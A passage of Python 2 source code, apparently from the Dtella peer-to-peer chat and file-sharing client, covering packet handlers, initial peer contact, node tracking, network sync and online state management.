osm.pgm.receivedPing(src_ipp, uwant, u_got_ack, req_key, ack_key, nbs)
def handlePacket_YQ(self, ad, data):
# Sync Request
(kind, nb_ipp, hop, flags, src_ipp, sesid
) = self.decodePacket('!2s6sBB6s4s', data)
osm = self.main.osm
if not (osm and osm.syncd):
raise BadTimingError("Not ready to handle a sync request")
# Hidden nodes shouldn't be getting sync requests.
if self.main.hide_node:
raise BadTimingError("Hidden node can't handle sync requests.")
self.checkSource(nb_ipp, ad, exempt_ip=True)
src_ad = Ad().setRawIPPort(src_ipp)
if not src_ad.auth('sbx', self.main):
raise BadPacketError("Invalid source IP")
timedout = bool(flags & TIMEDOUT_BIT)
if not 0 <= hop <= 2:
raise BadPacketError("Bad hop count")
elif hop == 2 and src_ipp != nb_ipp:
raise BadPacketError("Source ip mismatch")
# Decrease hop count, and call handler
osm.yqrm.receivedSyncRequest(nb_ipp, src_ipp, sesid, hop, timedout)
def handlePacket_YR(self, ad, data):
# Sync Reply
osm = self.main.osm
if not (osm and osm.sm):
raise BadTimingError("Not ready for sync reply")
(kind, src_ipp, pktnum, expire, sesid, uptime, flags, rest
) = self.decodePacket('!2s6sIH4sIB+', data)
self.checkSource(src_ipp, ad)
persist = bool(flags & PERSIST_BIT)
nick, rest = self.decodeString1(rest)
info, rest = self.decodeString1(rest)
topic, rest = self.decodeString1(rest)
c_nbs, rest = self.decodeNodeList(rest)
u_nbs, rest = self.decodeNodeList(rest)
# 2011-08-21: allow 'rest' to be non-empty, in case we want to add
# new fields someday.
if len(rest) > 1024:
raise BadPacketError("Too much extra data")
if not (5 <= expire <= 30*60):
raise BadPacketError("Expire time out of range")
try:
n = osm.lookup_ipp[src_ipp]
except KeyError:
n = None
if self.isFromBridgeNode(n, src_ipp):
raise BadPacketError("Bridge can't use YR")
# Check for outdated status, in case an NS already arrived.
if not self.isOutdatedStatus(n, pktnum):
n = osm.refreshNodeStatus(
src_ipp, pktnum, expire, sesid, uptime, persist, nick, info)
if topic:
osm.tm.receivedSyncTopic(n, topic)
osm.sm.receivedSyncReply(src_ipp, c_nbs, u_nbs)
def handlePacket_EC(self, ad, data):
# Login echo
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready for login echo")
(kind, rand
) = self.decodePacket('!2s8s', data)
osm.receivedLoginEcho(ad, rand)
##############################################################################
class InitialContactManager(DatagramProtocol):
# Scans through a list of known IP:Ports, and send a small ping to a
# bunch of them. Collect addresses of known online peers, and eventually
# Pass off the list to the neighbor connection manager.
class PeerInfo(object):
# Keep the latest timestamps at the top of the heap.
__lt__ = lambda self,other: self.seen > other.seen
__le__ = lambda self,other: self.seen >= other.seen
def __init__(self, ipp, seen):
self.ipp = ipp
self.seen = seen
self.inheap = True
self.timeout_dcall = None
self.alt_reply = False
self.bad_code = False
def __init__(self, main):
self.main = main
self.deferred = None
self.peers = {} # {IPPort -> PeerInfo object}
for ipp, seen in self.main.state.peers.iteritems():
self.peers[ipp] = self.PeerInfo(ipp, seen)
self.heap = self.peers.values()
heapq.heapify(self.heap)
self.waitreply = set()
self.node_ipps = set()
self.initrequest_dcall = None
self.finish_dcall = None
self.counters = {
'good':0, 'foreign_ip':0, 'banned_ip':0, 'dead_port':0}
def start(self):
CHECK(self.deferred is None)
self.deferred = defer.Deferred()
self.main.showLoginStatus("Scanning For Online Nodes...", counter=1)
# Get the main UDP socket's bind interface (usually empty)
bind_ip = self.main.ph.transport.interface
# Listen on an arbitrary UDP port
try:
reactor.listenUDP(0, self, interface=bind_ip)
except twisted.internet.error.BindError:
self.main.showLoginStatus("Failed to bind alt UDP port!")
self.deferred.callback(('no_nodes', None))
else:
self.scheduleInitRequest()
return self.deferred
def newPeer(self, ipp, seen):
# Called by PeerAddressManager
try:
p = self.peers[ipp]
except KeyError:
p = self.peers[ipp] = self.PeerInfo(ipp, seen)
heapq.heappush(self.heap, p)
self.scheduleInitRequest()
else:
if seen > p.seen:
p.seen = seen
# Bubble it up the heap.
# This takes O(n) and uses an undocumented heapq function...
if p.inheap:
heapq._siftdown(self.heap, 0, self.heap.index(p))
def scheduleInitRequest(self):
if not self.deferred:
return
if self.initrequest_dcall:
return
def cb():
self.initrequest_dcall = None
try:
p = heapq.heappop(self.heap)
except IndexError:
self.checkStatus()
return
p.inheap = False
ad = Ad().setRawIPPort(p.ipp)
packet = ['IQ']
packet.append(ad.getRawIP())
packet.append(struct.pack('!H', self.main.state.udp_port))
self.main.logPacket("IQ -> %s:%d" % ad.getAddrTuple())
packet = self.main.pk_enc.encrypt(''.join(packet))
try:
# Send from the alternate port
self.transport.write(packet, ad.getAddrTuple())
except (AttributeError, socket.error):
# Socket got funky, let the timeouts take care of it.
pass
except RuntimeError:
# Workaround for the Twisted infinte recursion bug
pass
else:
self.schedulePeerContactTimeout(p)
self.initrequest_dcall = reactor.callLater(0.05, cb)
self.initrequest_dcall = reactor.callLater(0, cb)
def schedulePeerContactTimeout(self, p):
CHECK(p not in self.waitreply)
self.waitreply.add(p)
def cb():
p.timeout_dcall = None
self.waitreply.remove(p)
if p.alt_reply:
self.recordResultType('dead_port')
self.checkStatus()
p.timeout_dcall = reactor.callLater(5.0, cb)
def cancelPeerContactTimeout(self, p):
try:
self.waitreply.remove(p)
except KeyError:
return False
dcall_discard(p, 'timeout_dcall')
return True
def receivedInitResponse(self, src_ipp, myip, code, pc, nd=None):
# Get my own IP address
my_ad = Ad().setRawIP(myip)
self.main.logPacket("Init Response: myip=%s code=%d" %
(my_ad.getTextIP(), code))
try:
p = self.peers[src_ipp]
except KeyError:
raise BadPacketError("Didn't ask for this response")
if nd is None:
# IC packet
# Ignore if we've already gotten one, or if
# The IR has already arrived, or expired.
if p.alt_reply or p.timeout_dcall is None:
return
p.alt_reply = True
else:
# IR packet
if not self.cancelPeerContactTimeout(p):
# Wasn't waiting for this reply
return
# Add some new peers to our cache
if pc:
for ipp, age in pc:
ad = Ad().setRawIPPort(ipp)
self.main.state.refreshPeer(ad, age)
# Add my own IP to the list, even if it's banned.
src_ad = Ad().setRawIPPort(src_ipp)
self.main.addMyIPReport(src_ad, my_ad)
if code != CODE_IP_OK:
if not p.bad_code:
p.bad_code = True
if code == CODE_IP_FOREIGN:
self.recordResultType('foreign_ip')
elif code == CODE_IP_BANNED:
self.recordResultType('banned_ip')
self.cancelPeerContactTimeout(p)
self.checkStatus()
return
# Add the node who sent this packet to the cache
self.main.state.refreshPeer(src_ad, 0)
# If this is an IC packet, stop here.
if nd is None:
return
# Add to set of currently online nodes
if nd:
for ipp, age in nd:
ad = Ad().setRawIPPort(ipp)
# Add to the peer cache
self.main.state.refreshPeer(ad, age)
# Add to set of probably-active nodes
self.node_ipps.add(ipp)
self.recordResultType('good')
# Check if there's nothing left to do
self.checkStatus()
def recordResultType(self, kind):
self.main.logPacket("Recording result: '%s'" % kind)
self.counters[kind] += 1
# Finish init after 5 seconds of inactivity
if self.finish_dcall:
self.finish_dcall.reset(5.0)
return
def cb():
self.finish_dcall = None
self.checkStatus(finished=True)
self.finish_dcall = reactor.callLater(5.0, cb)
def checkStatus(self, finished=False):
# Stop if
# - We receive 5 good replies, which make up >= 10% of the total
# - We receive 50 total replies
# - There is a 5-second gap of no new replies
# After stopping, successful if good makes up >= 10% of the total
total = sum(self.counters.values())
ngood = self.counters['good']
if not (self.heap or self.waitreply) or total >= 50:
finished = True
if finished:
if total > 0 and ngood >= total * 0.10:
self.initCompleted(good=True)
else:
self.initCompleted(good=False)
elif ngood >= 5 and ngood >= total * 0.10:
self.initCompleted(good=True)
def initCompleted(self, good):
self.shutdown()
if good:
self.deferred.callback(('good', self.node_ipps))
else:
# In a tie, prefer 'banned_ip' over 'foreign_ip', etc.
rank = []
i = 3
for name in ('banned_ip', 'foreign_ip', 'dead_port'):
rank.append( (self.counters[name], i, name) )
i -= 1
# Sort in descending order
rank.sort(reverse=True)
if rank[0][0] == 0:
# Nobody replied
self.deferred.callback(('no_nodes', None))
else:
# Return the name of the failure which occurred most
self.deferred.callback((rank[0][2], None))
def datagramReceived(self, data, addr):
# Let the main PeerHandler take care of decoding packets sent
# to the alternate UDP port.
self.main.ph.datagramReceived(data, addr, altport=True)
def shutdown(self):
# Cancel all dcalls
dcall_discard(self, 'initrequest_dcall')
dcall_discard(self, 'finish_dcall')
for p in self.peers.values():
dcall_discard(p, 'timeout_dcall')
# Close socket
if self.transport:
self.transport.stopListening()
##############################################################################
class Node(object):
implements(IDtellaNickNode)
__lt__ = lambda self,other: self.dist < other.dist
__le__ = lambda self,other: self.dist <= other.dist
# For statistics (bridge nicks are False)
is_peer = True
# This will be redefined for bridge nodes
bridge_data = None
# Remember when we receive a RevConnect
rcWindow_dcall = None
def __init__(self, ipp):
# Dtella Tracking stuff
self.ipp = ipp # 6-byte IP:Port
self.sesid = None # 4-byte session ID
self.dist = None # 16-byte md5 "distance"
self.expire_dcall = None # dcall for expiring stale nodes
self.status_pktnum = None # Pktnum of last status update
# ChatMessageSequencer stuff
self.chatq = []
self.chatq_base = None
self.chatq_dcall = None
# ack_key -> timeout DelayedCall
self.msgkeys_out = {}
self.msgkeys_in = {}
# General Info
self.nick = ''
self.dcinfo = ''
self.location = ''
self.shared = 0
self.dttag = ""
self.infohash = None
self.uptime = 0.0
self.persist = False
def calcDistance(self, me):
# Distance is pseudo-random, to keep the network spread out
my_key = me.ipp + me.sesid
nb_key = self.ipp + self.sesid
if my_key <= nb_key:
self.dist = md5(my_key + nb_key).digest()
else:
self.dist = md5(nb_key + my_key).digest()
def nickHash(self):
# Return a 4-byte hash to prevent a transient nick mismapping
if self.nick:
return md5(self.ipp + self.sesid + self.nick).digest()[:4]
else:
return None
def flags(self):
flags = (self.persist and PERSIST_BIT)
return struct.pack('!B', flags)
def getPMAckKey(self):
# Generate random packet ID for messages going TO this node
while 1:
ack_key = randbytes(8)
if ack_key not in self.msgkeys_out:
break
return ack_key
def pokePMKey(self, ack_key):
# Schedule expiration of a PM ack key, for messages we
# receive _FROM_ this node.
# Return True if this is a new key
try:
self.msgkeys_in[ack_key].reset(60.0)
return False
except KeyError:
def cb():
self.msgkeys_in.pop(ack_key)
self.msgkeys_in[ack_key] = reactor.callLater(60.0, cb)
return True
def setInfo(self, info):
old_dcinfo = self.dcinfo
self.dcinfo, self.location, self.shared = (
parse_incoming_info(SSLHACK_filter_flags(info)))
if self.sesid is None:
# Node is uninitialized
self.infohash = None
else:
self.infohash = md5(
self.sesid + self.flags() + self.nick + '|' + info
).digest()[:4]
return self.dcinfo != old_dcinfo
def setNoUser(self):
# Wipe out the nick, and set info to contain only a Dt tag.
self.nick = ''
if self.dttag:
self.setInfo("<%s>" % self.dttag)
else:
self.setInfo("")
def openRevConnectWindow(self):
# When get a RevConnect, create a 5-second window during
# which errors are suppressed for outgoing connects.
if self.rcWindow_dcall:
self.rcWindow_dcall.reset(5.0)
return
def cb():
del self.rcWindow_dcall
self.rcWindow_dcall = reactor.callLater(5.0, cb)
def checkRevConnectWindow(self):
# If the RevConnect window is open, close it and return True.
if self.rcWindow_dcall:
self.rcWindow_dcall.cancel()
del self.rcWindow_dcall
return True
else:
return False
def sendPrivateMessage(self, ph, ack_key, packet, fail_cb):
# Send an ACK-able direct message to this node
def cb(tries):
if tries == 0:
del self.msgkeys_out[ack_key]
fail_cb("Timeout")
return
ad = Ad().setRawIPPort(self.ipp)
ph.sendPacket(packet, ad.getAddrTuple())
# Set timeout for outbound message
# This will be cancelled if we receive an AK in time.
dcall = reactor.callLater(1.0, cb, tries-1)
dcall.pm_fail_cb = fail_cb
self.msgkeys_out[ack_key] = dcall
# Send it 3 times, then fail.
cb(3)
def receivedPrivateMessageAck(self, ack_key, reject):
# Got an ACK for a private message
try:
dcall = self.msgkeys_out.pop(ack_key)
except KeyError:
return
if reject:
dcall.pm_fail_cb("Rejected")
dcall.cancel()
def event_PrivateMessage(self, main, text, fail_cb):
osm = main.osm
if len(text) > 1024:
text = text[:1024-12] + ' [Truncated]'
flags = 0
ack_key = self.getPMAckKey()
packet = ['PM']
packet.append(osm.me.ipp)
packet.append(ack_key)
packet.append(osm.me.nickHash())
packet.append(self.nickHash())
packet.append(struct.pack('!BH', flags, len(text)))
packet.append(text)
packet = ''.join(packet)
self.sendPrivateMessage(main.ph, ack_key, packet, fail_cb)
def event_ConnectToMe(self, main, port, use_ssl, fail_cb):
osm = main.osm
ack_key = self.getPMAckKey()
flags = (use_ssl and USE_SSL_BIT)
packet = ['CA']
packet.append(osm.me.ipp)
packet.append(ack_key)
packet.append(osm.me.nickHash())
packet.append(self.nickHash())
if flags:
# SSLHACK: This packet can't be understood by older Dtella
# versions, but stripping the SSL flag from MyINFO should
# prevent it from happening very often.
packet.append(struct.pack('!B', flags))
packet.append(struct.pack('!H', port))
packet = ''.join(packet)
self.sendPrivateMessage(main.ph, ack_key, packet, fail_cb)
def event_RevConnectToMe(self, main, fail_cb):
osm = main.osm
ack_key = self.getPMAckKey()
packet = ['CP']
packet.append(osm.me.ipp)
packet.append(ack_key)
packet.append(osm.me.nickHash())
packet.append(self.nickHash())
packet = ''.join(packet)
self.sendPrivateMessage(main.ph, ack_key, packet, fail_cb)
def nickRemoved(self, main):
osm = main.osm
# Cancel all pending privmsg timeouts
for dcall in self.msgkeys_in.itervalues():
dcall.cancel()
for dcall in self.msgkeys_out.itervalues():
dcall.cancel()
self.msgkeys_in.clear()
self.msgkeys_out.clear()
osm.cms.clearQueue(self)
# Bridge stuff
if osm.bsm:
osm.bsm.nickRemoved(self)
def shutdown(self, main):
dcall_discard(self, 'expire_dcall')
dcall_discard(self, 'rcWindow_dcall')
self.nickRemoved(main)
if self.bridge_data:
self.bridge_data.shutdown()
verifyClass(IDtellaNickNode, Node)
class MeNode(Node):
info_out = ""
def event_PrivateMessage(self, main, text, fail_cb):
dch = main.getOnlineDCH()
if dch:
dch.pushPrivMsg(dch.nick, text)
else:
fail_cb("I'm not online!")
def event_ConnectToMe(self, main, port, use_ssl, fail_cb):
fail_cb("can't get files from yourself!")
def event_RevConnectToMe(self, main, fail_cb):
fail_cb("can't get files from yourself!")
verifyClass(IDtellaNickNode, MeNode)
##############################################################################
class SyncManager(object):
class SyncInfo(object):
def __init__(self, ipp):
self.ipp = ipp
self.timeout_dcall = None
self.fail_limit = 2
# Used for stats
self.in_total = False
self.in_done = False
self.proxy_request = False
def __init__(self, main):
self.main = main
self.uncontacted = RandSet()
self.waitcount = 0
self.info = {}
for n in self.main.osm.nodes:
s = self.info[n.ipp] = self.SyncInfo(n.ipp)
s.in_total = True
self.uncontacted.add(n.ipp)
# Keep stats for how far along we are
self.stats_done = 0
self.stats_total = len(self.uncontacted)
self.stats_lastbar = -1
self.proxy_success = 0
self.proxy_failed = 0
self.main.showLoginStatus("Network Sync In Progress...", counter='inc')
self.showProgress_dcall = None
self.showProgress()
# Start smaller to prevent an initial flood
self.request_limit = 2
self.advanceQueue()
def updateStats(self, s, done, total):
# Update the sync statistics for a single node.
if done > 0 and not s.in_done:
s.in_done = True
self.stats_done += 1
elif done < 0 and s.in_done:
s.in_done = False
self.stats_done -= 1
if total > 0 and not s.in_total:
s.in_total = True
self.stats_total += 1
elif total < 0 and s.in_total:
s.in_total = False
self.stats_total -= 1
def showProgress(self):
# Notify the user of the sync stats, if they've changed.
MAX = 20
done = self.stats_done
total = self.stats_total
if total == 0:
bar = MAX
else:
bar = (MAX * done) // total
dcall_discard(self, 'showProgress_dcall')
def cb():
self.showProgress_dcall = None
if bar == self.stats_lastbar:
return
self.stats_lastbar = bar
progress = '>'*bar + '_'*(MAX-bar)
self.main.showLoginStatus(
"[%s] (%d/%d)" % (progress, done, total))
if bar == MAX:
# The final update should draw immediately
cb()
else:
# Otherwise, only draw once per reactor loop
self.showProgress_dcall = reactor.callLater(0, cb)
def advanceQueue(self):
# Raise request limit the first time it fills up
if self.request_limit < 5 and self.waitcount >= 5:
self.request_limit = 5
while self.waitcount < self.request_limit:
try:
# Grab an arbitrary (semi-pseudorandom) uncontacted node.
ipp = self.uncontacted.pop()
except KeyError:
# Ran out of nodes; see if we're done yet.
if self.waitcount == 0:
dcall_discard(self, 'showProgress_dcall')
self.main.osm.syncComplete()
return
s = self.info[ipp]
osm = self.main.osm
ph = self.main.ph
hops = 2
flags = (s.fail_limit < 2) and TIMEDOUT_BIT
# Send the sync request
packet = osm.mrm.broadcastHeader('YQ', osm.me.ipp, hops, flags)
packet.append(osm.me.sesid)
ad = Ad().setRawIPPort(s.ipp)
ph.sendPacket(''.join(packet), ad.getAddrTuple())
self.scheduleSyncTimeout(s)
def giveUpNode(self, ipp):
# This node seems to have left the network, so don't contact it.
try:
s = self.info.pop(ipp)
except KeyError:
return
self.uncontacted.discard(ipp)
self.cancelSyncTimeout(s)
self.updateStats(s, -1, -1)
self.showProgress()
def receivedSyncReply(self, src_ipp, c_nbs, u_nbs):
my_ipp = self.main.osm.me.ipp
# Loop through all the nodes that were just contacted by proxy
for ipp in c_nbs:
if ipp == my_ipp:
continue
try:
s = self.info[ipp]
except KeyError:
# Haven't seen this one before, set a timeout because
# we should be hearing a reply.
s = self.info[ipp] = self.SyncInfo(ipp)
self.scheduleSyncTimeout(s, proxy=True)
self.updateStats(s, 0, +1)
else:
if ipp in self.uncontacted:
# Seen this node, had planned to ping it later.
# Pretend like we just pinged it now.
self.uncontacted.discard(ipp)
self.scheduleSyncTimeout(s, proxy=True)
# Loop through all the nodes which weren't contacted by this
# host, but that the host is neighbors with.
for ipp in u_nbs:
if ipp == my_ipp:
continue
if ipp not in self.info:
# If we haven't heard of this node before, create some
# info and plan on pinging it later
s = self.info[ipp] = self.SyncInfo(ipp)
self.uncontacted.add(ipp)
self.updateStats(s, 0, +1)
self.advanceQueue()
# Mark off that we've received a reply.
try:
s = self.info[src_ipp]
except KeyError:
s = self.info[src_ipp] = self.SyncInfo(src_ipp)
# Keep track of NAT stats
if s.proxy_request:
s.proxy_request = False
if s.fail_limit == 2:
self.proxy_success += 1
elif s.fail_limit == 1:
self.proxy_failed += 1
if (self.proxy_failed + self.proxy_success >= 10 and
self.proxy_failed > self.proxy_success):
self.main.needPortForward()
return
self.uncontacted.discard(src_ipp)
self.updateStats(s, +1, +1)
self.showProgress()
self.cancelSyncTimeout(s)
def scheduleSyncTimeout(self, s, proxy=False):
if s.timeout_dcall:
return
def cb():
s.timeout_dcall = None
self.waitcount -= 1
s.fail_limit -= 1
if s.fail_limit > 0:
# Try again later
self.uncontacted.add(s.ipp)
else:
self.updateStats(s, 0, -1)
self.showProgress()
self.advanceQueue()
# Remember if this was requested first by another node
if s.fail_limit == 2 and proxy:
s.proxy_request = True
self.waitcount += 1
s.timeout_dcall = reactor.callLater(2.0, cb)
def cancelSyncTimeout(self, s):
if not s.timeout_dcall:
return
dcall_discard(s, 'timeout_dcall')
self.waitcount -= 1
self.advanceQueue()
def shutdown(self):
# Cancel all timeouts
dcall_discard(self, 'showProgress_dcall')
for s in self.info.values():
dcall_discard(s, 'timeout_dcall')
##############################################################################
class OnlineStateManager(object):
def __init__(self, main, my_ipp, node_ipps, bcm=None, bsm=None):
self.main = main
self.main.osm = self
self.syncd = False
# Don't allow myself in the nodes list
if node_ipps:
node_ipps.discard(my_ipp)
# Create a Node for me
self.me = MeNode(my_ipp)
self.me.sesid = randbytes(4)
self.me.uptime = seconds()
# NickManager
self.nkm = NickManager(main)
# MessageRoutingManager
self.mrm = MessageRoutingManager(main)
# PingManager
self.pgm = PingManager(main)
# TopicManager
self.tm = TopicManager(main)
# BanManager
self.banm = BanManager(main)
# ChatMessageSequencer
self.cms = ChatMessageSequencer(main)
# BridgeClientManager / BridgeServerManager
self.bcm = bcm
self.bsm = bsm
# SyncManager (init after contacting the first neighbor)
self.sm = None
# Init all these when sync is established:
self.yqrm = None # SyncRequestRoutingManager
self.sendStatus_dcall = None
# Keep track of outbound status rate limiting
self.statusLimit_time = seconds() - 999
self.statusLimit_dcall = None
self.sendLoginEcho()
# List of online nodes, sorted by random distance.
self.nodes = []
# Index of online nodes: ipp -> Node()
self.lookup_ipp = {}
for ipp in node_ipps:
self.addNodeToNodesList(Node(ipp))
# Initially, we'll just connect to random nodes.
# This list will be sorted after syncing is finished.
random.shuffle(self.nodes)
if self.nodes:
self.main.showLoginStatus(
"Joining The Network.", counter='inc')
self.pgm.scheduleMakeNewLinks()
else:
self.main.showLoginStatus(
"Creating a new empty network.", counter='inc')
self.syncComplete()
def syncComplete(self):
# Forget the SyncManager
self.sm = None
# Unconfirmed nodes (without an expiration) can't exist once the
# network is syncd, so purge them from the nodes list.
old_nodes = self.nodes
self.nodes = []
self.lookup_ipp.clear()
for n in old_nodes:
if n.expire_dcall:
self.addNodeToNodesList(n)
else:
self.pgm.removeOutboundLink(n.ipp)
self.reorderNodesList()
# Get ready to handle Sync requests from other nodes
self.yqrm = SyncRequestRoutingManager(self.main)
self.syncd = True
if self.bsm:
self.bsm.syncComplete()
# Connect to the "closest" neighbors
self.pgm.scheduleMakeNewLinks()
# Tell observers to get the nick list, topic, etc.
self.main.stateChange_DtellaUp()
self.main.showLoginStatus(
"Sync Complete; You're Online!", counter='inc')
def refreshNodeStatus(self, src_ipp, pktnum, expire, sesid, uptime,
persist, nick, info):
CHECK(src_ipp != self.me.ipp)
try:
n = self.lookup_ipp[src_ipp]
in_nodes = True
except KeyError:
n = Node(src_ipp)
in_nodes = False
self.main.logPacket("Status: %s %d (%s)" %
(hexlify(src_ipp), expire, nick))
# Update the last-seen status packet number
n.status_pktnum = pktnum
# Change uptime to a fixed time when the node went up
uptime = seconds() - uptime
if self.syncd and in_nodes and n.sesid != sesid:
# session ID changed; remove n from sorted nodes list
# so that it will be reinserted into the correct place
self.removeNodeFromNodesList(n)
in_nodes = False
# Update info
n.sesid = sesid
n.uptime = uptime
n.persist = persist
# Save version info
n.dttag = parse_dtella_tag(info)
if nick == n.nick:
# Nick hasn't changed, just update info
self.nkm.setInfoInList(n, info)
else:
# Nick has changed.
# Remove old nick, if it's in there
self.nkm.removeNode(n, "No DC client")
# Run a sanity check on the new nick
if nick and validateNick(nick) != '':
# Malformed
n.setNoUser()
else:
# Good nick, update the info
n.nick = nick
n.setInfo(info)
# Try to add the new nick (no-op if the nick is empty)
try:
self.nkm.addNode(n)
except NickError:
n.setNoUser()
# If n isn't in nodes list, then add it
if not in_nodes:
self.addNodeToNodesList(n)
# Expire this node after the expected retransmit
self.scheduleNodeExpire(n, expire + NODE_EXPIRE_EXTEND)
# Possibly make this new node an outgoing link
self.pgm.scheduleMakeNewLinks()
# Return the node
return n
def nodeExited(self, n, reason):
# Node n dropped off the network
dcall_discard(n, 'expire_dcall')
self.removeNodeFromNodesList(n)
# Tell the TopicManager this node is leaving
self.tm.checkLeavingNode(n)
# If it's a bridge node, clean up the extra data
if n.bridge_data:
n.bridge_data.myNodeExited()
del n.bridge_data
# Remove from the nick mapping
self.nkm.removeNode(n, reason)
n.dttag = ""
n.setNoUser()
# Remove from the SyncManager, if it's active
if self.sm:
self.sm.giveUpNode(n.ipp)
# Remove from outbound links; find more if needed.
if self.pgm.removeOutboundLink(n.ipp):
self.pgm.scheduleMakeNewLinks()
def addNodeToNodesList(self, n):
if self.syncd:
n.calcDistance(self.me)
bisect.insort(self.nodes, n)
else:
self.nodes.append(n)
self.lookup_ipp[n.ipp] = n
def removeNodeFromNodesList(self, n):
# Remove a node from self.nodes. It must exist.
if self.syncd:
i = bisect.bisect_left(self.nodes, n)
CHECK(self.nodes[i] == n)
del self.nodes[i]
else:
self.nodes.remove(n)
del self.lookup_ipp[n.ipp]
def reorderNodesList(self):
# Recalculate and sort all nodes in the nodes list.
for n in self.nodes:
n.calcDistance(self.me)
self.nodes.sort()
def scheduleNodeExpire(self, n, when):
# Schedule a timer for the given node to expire from the network
if n.expire_dcall:
n.expire_dcall.reset(when)
return
def cb():
n.expire_dcall = None
self.nodeExited(n, "Node Timeout")
n.expire_dcall = reactor.callLater(when, cb)
def getStatus(self):
status = []
# My Session ID
status.append(self.me.sesid)
# My Uptime and Flags
status.append(struct.pack('!I', int(seconds() - self.me.uptime)))
status.append(self.me.flags())
# My Nick
status.append(struct.pack('!B', len(self.me.nick)))
status.append(self.me.nick)
# My Info
status.append(struct.pack('!B', len(self.me.info_out)))
status.append(self.me.info_out)
return status
def updateMyInfo(self, send=False):
# Grab my info from the DC client (if any) and maybe broadcast
# it into the network.
# If I'm a bridge, send bridge state instead.
if self.bsm:
if self.syncd:
self.bsm.sendState()
return
dch = self.main.getOnlineDCH()
me = self.me
old_state = (me.nick, me.info_out, me.persist)
me.persist = self.main.state.persistent
me.dttag = get_version_string()
if dch:
me.info_out = dch.formatMyInfo()
nick = dch.nick
else:
me.info_out = "<%s>" % me.dttag
nick = ''
if me.nick == nick:
# Nick hasn't changed, just update info
self.nkm.setInfoInList(me, me.info_out)
else:
# Nick has changed
# Remove old node, if I'm in there
self.nkm.removeNode(me, "Removing Myself")
# Set new info
me.nick = nick
me.setInfo(me.info_out)
# Add it back in, (no-op if my nick is empty)
try:
self.nkm.addNode(me)
except NickError:
# Nick collision. Force the DC client to go invisible.
# This will recursively call updateMyInfo with an empty nick.
lines = [
"The nick <%s> is already in use on this network." % nick,
"Please change your nick, or type !REJOIN to try again."
]
self.main.kickObserver(lines=lines, rejoin_time=None)
return
changed = (old_state != (me.nick, me.info_out, me.persist))
if (send or changed) and self.syncd:
self.sendMyStatus()
def sendMyStatus(self, sendfull=True):
# Immediately send my status, and keep sending updates over time.
# This should never be called for a bridge.
CHECK(not self.bsm)
# Skip this stuff for hidden nodes.
if self.main.hide_node:
return
self.checkStatusLimit()
def cb(sendfull):
# Choose an expiration time so that the network handles
# approximately 1 status update per second, but set bounds of
# about 1-15 minutes
expire = max(60.0, min(900.0, len(self.nodes)))
expire *= random.uniform(0.9, 1.1)
self.sendStatus_dcall = reactor.callLater(expire, cb, False)
pkt_id = struct.pack('!I', self.mrm.getPacketNumber_status())
if sendfull:
packet = self.mrm.broadcastHeader('NS', self.me.ipp)
packet.append(pkt_id)
packet.append(struct.pack('!H', int(expire)))
packet.extend(self.getStatus())
else:
packet = self.mrm.broadcastHeader('NH', self.me.ipp)
packet.append(pkt_id)
packet.append(struct.pack('!H', expire))
packet.append(self.me.infohash)
self.mrm.newMessage(''.join(packet), tries=8)
dcall_discard(self, 'sendStatus_dcall')
cb(sendfull)
def checkStatusLimit(self):
# Do a sanity check on the rate of status updates that I'm sending.
# If other nodes are causing me to trigger a lot, then something's
# amiss, so go to sleep for a while.
if self.statusLimit_dcall:
return
# Limit to 8 updates over 8 seconds
now = seconds()
self.statusLimit_time = max(self.statusLimit_time, now-8.0)
self.statusLimit_time += 1.0
if self.statusLimit_time < now:
return
def cb():
self.statusLimit_dcall = None
self.main.showLoginStatus("*** YIKES! Too many status updates!")
self.main.shutdown(reconnect='max')
self.statusLimit_dcall = reactor.callLater(0, cb)
def isModerated(self):
if self.bcm:
return self.bcm.isModerated()
if self.bsm:
return self.bsm.isModerated()
return False
def sendLoginEcho(self):
# Send a packet to myself, in order to determine how my router
# (if any) reacts to loopback'd packets.
def cb():
self.loginEcho_dcall = None
self.loginEcho_rand = None
self.main.logPacket("No EC response")
echorand = ''.join([chr(random.randint(0,255)) for i in range(8)])
packet = ['EC']
packet.append(echorand)
ad = Ad().setRawIPPort(self.me.ipp)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
self.loginEcho_dcall = reactor.callLater(3.0, cb)
self.loginEcho_rand = echorand
def receivedLoginEcho(self, ad, rand):
if rand != self.loginEcho_rand:
raise BadPacketError("EC Rand mismatch")
myad = Ad().setRawIPPort(self.me.ipp)
dcall_discard(self, 'loginEcho_dcall')
self.loginEcho_rand = None
if ad.ip == myad.ip:
return
if ad.isPrivate():
# This matches an RFC1918 address, so it looks like a router.
# Remap this address to my external IP in the future
self.main.ph.remap_ip = (ad.ip, myad.ip)
self.main.logPacket("EC: Remap %s->%s" %
(ad.getTextIP(), myad.getTextIP()))
else:
self.main.logPacket("EC: Not RFC1918")
def makeExitPacket(self):
packet = self.mrm.broadcastHeader('NX', self.me.ipp)
packet.append(self.me.sesid)
return ''.join(packet)
def shutdown(self):
# Cancel all the dcalls here
dcall_discard(self, 'sendStatus_dcall')
dcall_discard(self, 'statusLimit_dcall')
# If I'm still syncing, shutdown the SyncManager
if self.sm:
self.sm.shutdown()
# Shut down the MessageRoutingManager (and broadcast NX)
if self.mrm:
self.mrm.shutdown()
# Shut down the BridgeServerManager
if self.bsm:
self.bsm.shutdown()
# Shut down all nodes
for n in self.nodes:
n.shutdown(self.main)
# Shut down the PingManager (and notify outbounds)
if self.pgm:
self.pgm.shutdown()
# Shut down the BanManager (just cancels some dcalls)
if self.banm:
self.banm.shutdown()
# Shut down the BridgeClientManager
if self.bcm:
self.bcm.shutdown()
# Shut down the SyncRequestRoutingManager
if self.yqrm:
self.yqrm.shutdown()
##############################################################################
class PingManager(object):
class PingNeighbor(object):
def __init__(self, ipp):
self.ipp = ipp
self.outbound = False
self.inbound = False
self.ping_reqs = {} # {ack_key: time sent}
self.sendPing_dcall = None # dcall for sending pings
self.deadNb_dcall = None # keep track of node failure
self.got_ack = False
self.u_got_ack = False
self.ping_nbs = None
self.avg_ping = None
def stillAlive(self):
# return True if the connection hasn't timed out yet
return (self.sendPing_dcall and
self.sendPing_dcall.args[0] >= 0)
def stronglyConnected(self):
# return True if both ends are willing to accept broadcast traffic
return (self.got_ack and self.u_got_ack)
OUTLINK_GOAL = 3
def __init__(self, main):
self.main = main
self.chopExcessLinks_dcall = None
self.makeNewLinks_dcall = None
# All of my ping neighbors: ipp -> PingNeighbor()
self.pnbs = {}
self.onlineTimeout_dcall = None
self.scheduleOnlineTimeout()
